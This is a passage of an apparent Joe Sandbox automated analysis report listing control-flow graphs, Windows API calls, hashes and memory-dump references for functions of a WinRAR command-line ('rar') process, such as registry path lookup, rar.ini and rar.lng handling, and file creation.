                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4143D1
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A414402
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A41440D
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A41443E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                      • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                      • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                      • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                      • Instruction ID: 1a5e37ed2a24bb2be6b81b1624a73f6bd68032a092272e7bd9e7946fbb946afb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD116066A1874285EB609F26F8005BA73E0FF96FC4F4451B1EA4E87A55DF3CE054C744
                                                                                                                                                                                                                                      Function 00007FF69A3E7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1715 7ff69a3e7a5b-7ff69a3e7a5e 1716 7ff69a3e7a60-7ff69a3e7a66 1715->1716 1717 7ff69a3e7a68 1715->1717 1716->1717 1718 7ff69a3e7a6b-7ff69a3e7a7c 1716->1718 1717->1718 1719 7ff69a3e7a7e-7ff69a3e7a81 1718->1719 1720 7ff69a3e7aa8 1718->1720 1721 7ff69a3e7a83-7ff69a3e7a86 1719->1721 1722 7ff69a3e7a88-7ff69a3e7a8b 1719->1722 1723 7ff69a3e7aab-7ff69a3e7ab8 1720->1723 1721->1720 1721->1722 1724 7ff69a3e7aa4-7ff69a3e7aa6 1722->1724 1725 7ff69a3e7a8d-7ff69a3e7a90 1722->1725 1726 7ff69a3e7aba-7ff69a3e7abd 1723->1726 1727 7ff69a3e7ac8-7ff69a3e7acb 1723->1727 1724->1723 1725->1720 1728 7ff69a3e7a92-7ff69a3e7a99 1725->1728 1726->1727 1729 7ff69a3e7abf-7ff69a3e7ac6 1726->1729 1730 7ff69a3e7acf-7ff69a3e7ad1 1727->1730 1728->1724 1731 7ff69a3e7a9b-7ff69a3e7aa2 1728->1731 1729->1730 1732 7ff69a3e7ad3-7ff69a3e7ae6 1730->1732 1733 7ff69a3e7b2a-7ff69a3e7bb0 call 7ff69a401d34 call 7ff69a3e3f04 1730->1733 1731->1720 1731->1724 1735 7ff69a3e7b0a-7ff69a3e7b27 1732->1735 1736 7ff69a3e7ae8-7ff69a3e7af2 call 7ff69a3f9be0 1732->1736 1744 7ff69a3e7bb2-7ff69a3e7bba 1733->1744 1745 7ff69a3e7bbc 1733->1745 1735->1733 1739 7ff69a3e7af7-7ff69a3e7b02 1736->1739 1739->1735 1744->1745 1746 7ff69a3e7bbf-7ff69a3e7bc9 1744->1746 1745->1746 1747 7ff69a3e7bcb-7ff69a3e7bd5 call 7ff69a401e1c 1746->1747 1748 7ff69a3e7bda-7ff69a3e7c06 call 7ff69a3eb540 1746->1748 1747->1748 1752 7ff69a3e7c40 1748->1752 1753 7ff69a3e7c08-7ff69a3e7c0f 1748->1753 1755 7ff69a3e7c44-7ff69a3e7c5a call 7ff69a3eaa68 1752->1755 1753->1752 1754 7ff69a3e7c11-7ff69a3e7c14 1753->1754 1754->1752 1756 7ff69a3e7c16-7ff69a3e7c2b 1754->1756 1761 7ff69a3e7c85-7ff69a3e7c97 call 7ff69a3eb540 1755->1761 1762 7ff69a3e7c5c-7ff69a3e7c6a 1755->1762 1756->1755 1758 7ff69a3e7c2d-7ff69a3e7c3e call 7ff69a439b98 1756->1758 1758->1755 1766 7ff69a3e7c9c-7ff69a3e7c9f 1761->1766 1762->1761 1765 7ff69a3e7c6c-7ff69a3e7c7e call 7ff69a3e8d98 1762->1765 1765->1761 1768 7ff69a3e7ca5-7ff69a3e7cfb call 7ff69a419354 call 7ff69a406378 * 2 1766->1768 1769 7ff69a3e7fa4-7ff69a3e7fbe 1766->1769 1777 7ff69a3e7cfd-7ff69a3e7d10 call 7ff69a3e5414 1768->1777 1778 7ff69a3e7d17-7ff69a3e7d1f 1768->1778 1777->1778 1780 7ff69a3e7de2-7ff69a3e7de6 1778->1780 1781 7ff69a3e7d25-7ff69a3e7d28 1778->1781 1783 7ff69a3e7e4e-7ff69a3e7e68 call 7ff69a419958 1780->1783 1784 7ff69a3e7de8-7ff69a3e7e49 call 7ff69a4198dc 1780->1784 1781->1780 1785 7ff69a3e7d2e-7ff69a3e7d36 1781->1785 1793 7ff69a3e7e8b-7ff69a3e7e8e 1783->1793 1794 7ff69a3e7e6a-7ff69a3e7e84 1783->1794 1784->1783 1786 7ff69a3e7d59-7ff69a3e7d6a call 7ff69a43a444 1785->1786 1787 7ff69a3e7d38-7ff69a3e7d49 call 7ff69a43a444 1785->1787 1801 7ff69a3e7d6c-7ff69a3e7d77 call 7ff69a40cf8c 1786->1801 1802 7ff69a3e7d78-7ff69a3e7dc6 1786->1802 1799 7ff69a3e7d4b-7ff69a3e7d56 call 7ff69a408ae8 1787->1799 1800 7ff69a3e7d57 1787->1800 1797 7ff69a3e7e9f-7ff69a3e7eb8 call 7ff69a3e1204 1793->1797 1798 7ff69a3e7e90-7ff69a3e7e9a call 7ff69a419990 1793->1798 1794->1793 1813 7ff69a3e7ec8-7ff69a3e7ed9 call 7ff69a41941c 1797->1813 1798->1797 1799->1800 1800->1802 1801->1802 1802->1780 1823 7ff69a3e7dc8-7ff69a3e7de1 call 7ff69a3e1314 call 7ff69a43ba34 1802->1823 1817 7ff69a3e7edb-7ff69a3e7f9f call 7ff69a3e1400 call 7ff69a406424 call 7ff69a3eb540 1813->1817 1818 7ff69a3e7eba-7ff69a3e7ec3 call 7ff69a419680 1813->1818 1817->1769 1818->1813 1823->1780
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: H9
                                                                                                                                                                                                                                      • API String ID: 0-2207570329
                                                                                                                                                                                                                                      • Opcode ID: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                      • Instruction ID: ee37f538584d46723babede2b4d44193d558cfd63cf46dc0091cc3d81a0d07fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42E1A062A08A9286EB20DB25E048BFD37E9EB4574CF6544B9DE4DC3786DF38E954C700
                                                                                                                                                                                                                                      Function 00007FF69A402574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1858 7ff69a402574-7ff69a40259c 1859 7ff69a4025a5-7ff69a4025a9 1858->1859 1860 7ff69a40259e-7ff69a4025a0 1858->1860 1862 7ff69a4025ab-7ff69a4025b6 GetStdHandle 1859->1862 1863 7ff69a4025ba-7ff69a4025c6 1859->1863 1861 7ff69a40273a-7ff69a402756 1860->1861 1862->1863 1864 7ff69a402619-7ff69a402637 WriteFile 1863->1864 1865 7ff69a4025c8-7ff69a4025cd 1863->1865 1866 7ff69a40263b-7ff69a40263e 1864->1866 1867 7ff69a402644-7ff69a402648 1865->1867 1868 7ff69a4025cf-7ff69a402609 WriteFile 1865->1868 1866->1867 1869 7ff69a402733-7ff69a402737 1866->1869 1867->1869 1870 7ff69a40264e-7ff69a402652 1867->1870 1868->1867 1871 7ff69a40260b-7ff69a402615 1868->1871 1869->1861 1870->1869 1872 7ff69a402658-7ff69a402692 GetLastError call 7ff69a403144 SetLastError 1870->1872 1871->1868 1873 7ff69a402617 1871->1873 1878 7ff69a402694-7ff69a4026a2 1872->1878 1879 7ff69a4026bc-7ff69a4026d0 call 7ff69a3fc95c 1872->1879 1873->1866 1878->1879 1881 7ff69a4026a4-7ff69a4026ab 1878->1881 1884 7ff69a4026d2-7ff69a4026db 1879->1884 1885 7ff69a402721-7ff69a40272e call 7ff69a3fcf14 1879->1885 1881->1879 1883 7ff69a4026ad-7ff69a4026b7 call 7ff69a3fcf34 1881->1883 1883->1879 1884->1863 1887 7ff69a4026e1-7ff69a4026e3 1884->1887 1885->1869 1887->1863 1889 7ff69a4026e9-7ff69a40271c 1887->1889 1889->1863
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3350704910-0
                                                                                                                                                                                                                                      • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                      • Instruction ID: 310930bd5bdd6e0d7f9e3afa22477e6129eb05d6be22262ccc91cfb79f4091ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD516C26A1865286EB74DB26E41437A77E0FBA9F84F4401B5DB4EC7AA0CF3CE546C704
                                                                                                                                                                                                                                      Function 00007FF69A401E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1894 7ff69a401e80-7ff69a401ebb call 7ff69a43a5a0 1897 7ff69a401ebd-7ff69a401ec1 1894->1897 1898 7ff69a401ec8 1894->1898 1897->1898 1899 7ff69a401ec3-7ff69a401ec6 1897->1899 1900 7ff69a401ecb-7ff69a401f57 CreateFileW 1898->1900 1899->1900 1901 7ff69a401fcd-7ff69a401fd1 1900->1901 1902 7ff69a401f59-7ff69a401f76 GetLastError call 7ff69a414534 1900->1902 1903 7ff69a401fd3-7ff69a401fd7 1901->1903 1904 7ff69a401ff7-7ff69a40200f 1901->1904 1912 7ff69a401fba 1902->1912 1913 7ff69a401f78-7ff69a401fb6 CreateFileW GetLastError 1902->1913 1903->1904 1906 7ff69a401fd9-7ff69a401ff1 SetFileTime 1903->1906 1907 7ff69a402011-7ff69a402022 call 7ff69a42a9e8 1904->1907 1908 7ff69a402027-7ff69a40204b call 7ff69a43a610 1904->1908 1906->1904 1907->1908 1916 7ff69a401fbf-7ff69a401fc1 1912->1916 1913->1901 1915 7ff69a401fb8 1913->1915 1915->1916 1916->1901 1917 7ff69a401fc3 1916->1917 1917->1901
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                                                                                      • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                      • Instruction ID: 1e838a7a998f537f91ac168717177cae579310e1869f217dc30f64aa515d71f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33412472A1869146FB708B28E5057A97AE0EB96FB8F0013B8DE7D836C4DF7DC4458B40
                                                                                                                                                                                                                                      Function 00007FF69A3F6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                                                                                      • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                      • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                      • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                      • Instruction ID: d65434f87ce9e41e2ea1a031717647a0f9f89bd8581078a3c80b31026db5e705
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27418F21A1868282FA24DF21D8111B933E0EF54BA4F4055F9EA9EC36D6EF7CD946D300
                                                                                                                                                                                                                                      Function 00007FF69A417E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                      • String ID: rar.lng
                                                                                                                                                                                                                                      • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                      • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                      • Instruction ID: c8c53bb46efb41f8b8a6714f325f7eca10bb8ebd94c5b91e2083f78486053e9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56419221E1C68246FB34EB21A4112B973E0DFA1F94F5810F9E91EC72D7CE2DE4158751
                                                                                                                                                                                                                                      Function 00007FF69A4140A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?,00000800,?,00007FF69A414432,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4140C4
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4140DF
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32 ref: 00007FF69A4140F1
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A403458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF69A41413F,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4034A0
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A403458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF69A41413F,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4034D5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                      • String ID: WinRAR
                                                                                                                                                                                                                                      • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                      • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                      • Instruction ID: 0fc626bd2effef7ca70c1ea947e78c36fcd0771b72fe94cc82ddb5227e231221
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D218E66A08B4280EA60AF22F8541BA73A0EF9AFD0B1960B1DF0EC7759DF3CD4548740
                                                                                                                                                                                                                                      Function 00007FF69A44978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF69A443CEF,?,?,00000000,00007FF69A443CAA,?,?,00000000,00007FF69A443FD9), ref: 00007FF69A4497A5
